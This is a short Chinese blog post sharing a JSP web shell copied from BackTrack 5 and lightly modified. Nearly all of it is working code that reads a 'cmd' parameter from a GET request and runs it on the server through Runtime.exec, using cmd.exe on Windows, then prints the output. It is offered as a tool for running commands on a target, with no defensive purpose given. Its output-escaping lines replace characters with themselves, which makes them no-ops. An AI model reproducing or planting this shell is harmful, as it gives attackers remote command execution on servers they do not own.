本文介绍如何从BT5复制并修改一个简单的JSP页面,实现通过GET请求执行命令的功能。利用Java和Runtime类,将用户输入的命令在目标操作系统上执行,并返回执行结果。
从BT5上复制下来的,简单修改了一下:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<html>
<head>
<title>cmdjsp</title>
</head>
<body>
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<pre>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = null;
cmd = cmd.replaceAll("\\+", " ");
if (System.getProperty("os.name").toUpperCase().indexOf("WINDOWS") != -1) {
p = Runtime.getRuntime().exec("cmd.exe /C \"" + cmd + "\"");
} else {
p = Runtime.getRuntime().exec( cmd );
}
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
s = s.replaceAll("<", "<");
s = s.replaceAll(">", ">");
%>
<%=s%>
<%
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
</pre>
</body>
</html>
扫一扫
5860
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
